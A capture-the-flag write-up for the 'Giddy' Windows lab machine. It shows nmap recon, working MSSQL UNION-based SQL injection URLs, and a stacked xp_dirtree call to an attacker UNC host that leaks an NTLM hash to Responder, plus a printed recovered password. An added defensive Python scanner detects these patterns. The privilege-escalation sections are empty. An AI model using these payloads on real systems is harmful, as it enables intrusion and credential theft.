Giddy

Operating system | Difficulty | Release date      | Creator
Windows          | Medium     | 08 September 2018 | lkys37en

Reconnaissance

We send an ICMP probe to the target machine to check that we have connectivity.

Initial enumeration

We run an nmap scan to discover which TCP ports are open on the victim machine.

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.104                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 19:45 -03
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.104 [65535 ports]
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Completed SYN Stealth Scan at 19:46, 27.08s elapsed (65535 total ports)
Nmap scan report for 10.10.10.104
Host is up, received user-set (0.28s latency).
Scanned at 2025-03-27 19:45:32 -03 for 28s
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack ttl 127
443/tcp  open  https         syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.14 seconds
           Raw packets sent: 131084 (5.768MB) | Rcvd: 108 (21.256KB)

We run nmap's basic enumeration scripts against the open ports to identify the service and version running on each one.

nmap -sCV -p80,443,3389 -oN servicesScan 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 19:46 -03
Nmap scan report for 10.10.10.104 (10.10.10.104)
Host is up (0.15s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: 2025-03-27T22:49:19+00:00; +2m19s from scanner time.
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2025-03-26T22:37:46
|_Not valid after:  2025-09-25T22:37:46
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2025-03-27T22:49:13+00:00
|_ssl-date: 2025-03-27T22:49:19+00:00; +2m19s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m18s, deviation: 0s, median: 2m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.69 seconds

Initial exploitation

HTTP (80) - HTTPS (443)


SQL Injection

The database engine is SQL Server (MSSQL).

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),2,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1--%20-

The database in use is named Injection.

Union-based SQL injection.

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20master..sysdatabases--%20-

Databases.

SELECT name FROM master..sysdatabases

Tables.

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20Injection..sysobjects%20WHERE%20xtype=%27U%27--%20-
SELECT name FROM Injection..sysobjects WHERE xtype = 'U'

Columns

http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1%20FROM%20syscolumns%20WHERE%20id%20=%20(SELECT%20id%20FROM%20sysobjects%20WHERE%20name%20=%20%27Users%27)--%20-
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')

Data

SELECT UserId, UserName FROM Users

This does not lead anywhere, so we will try to execute commands.

We run the following command:

EXEC master.sys.xp_dirtree '\\10.10.14.32\share'--
http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=100;%20exec%20master.sys.xp_dirtree%20%27\\10.10.14.32\share%27--

We start listening with Responder:

responder -I tun0

We obtain the NTLM hash of the user Stacy.


stacy:xNnWo6272k7x
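From the defender's side, both the UNION-based catalog enumeration and the stacked `xp_dirtree` call to a UNC path leave the attacker's SQL in the IIS request log. The following Python example is added here and is not part of the original writeup: it runs simple signatures for those patterns over constructed IIS W3C log lines (the requests mirror the ones shown above, with shortened column lists) and reports which request matched which pattern.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (default field order). Two of the four
# requests reproduce the injection probes shown in this writeup.
SAMPLE_LOG = r"""
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2018-09-08 10:00:01 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=18 80 - 10.10.14.32 Mozilla/5.0 200
2018-09-08 10:00:07 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=100%20UNION%20SELECT%201,DB_NAME(),name,4,5,null,1%20FROM%20master..sysdatabases--%20- 80 - 10.10.14.32 Mozilla/5.0 200
2018-09-08 10:00:15 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=100;%20exec%20master.sys.xp_dirtree%20%27\\10.10.14.32\share%27-- 80 - 10.10.14.32 Mozilla/5.0 500
2018-09-08 10:00:20 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=19 80 - 10.10.14.32 Mozilla/5.0 200
"""

# Signatures are matched against the URL-decoded query string.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "catalog_read": re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I),
    "xp_dirtree": re.compile(r"\bxp_dirtree\b", re.I),
    # \\a.b.c.d\ : a UNC path pointing at an IP, the out-of-band NTLM trigger
    "unc_path": re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\"),
    "stacked_query": re.compile(r";\s*(exec|select|insert|update|delete|declare)\b", re.I),
}


def parse_iis_line(line):
    """Split one W3C log line using the default field order; None for headers/blanks."""
    if line.startswith("#"):
        return None
    fields = line.split(" ")
    if len(fields) < 11:
        return None
    return {"date": fields[0], "time": fields[1], "stem": fields[4],
            "query": unquote(fields[5]), "client": fields[8], "status": fields[10]}


def scan_iis_log(text):
    """Return (time, client_ip, uri_stem, [matched signatures]) per suspicious request."""
    findings = []
    for raw in text.splitlines():
        rec = parse_iis_line(raw)
        if rec is None:
            continue
        hits = [name for name, rx in SIGNATURES.items() if rx.search(rec["query"])]
        if hits:
            findings.append((rec["time"], rec["client"], rec["stem"], hits))
    return findings


if __name__ == "__main__":
    for time, client, stem, hits in scan_iis_log(SAMPLE_LOG):
        print(f"{time} {client} {stem} -> {', '.join(hits)}")
```

A UNC path in a query string combined with `xp_dirtree` is also a cue to correlate with outbound SMB (445/tcp) from the web server, since that is what actually leaks the service account's credential.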

We use these credentials to log in to the Windows PowerShell Web Access panel.

We read the user.txt flag.

Privilege escalation

Post-exploitation

We read the root flag.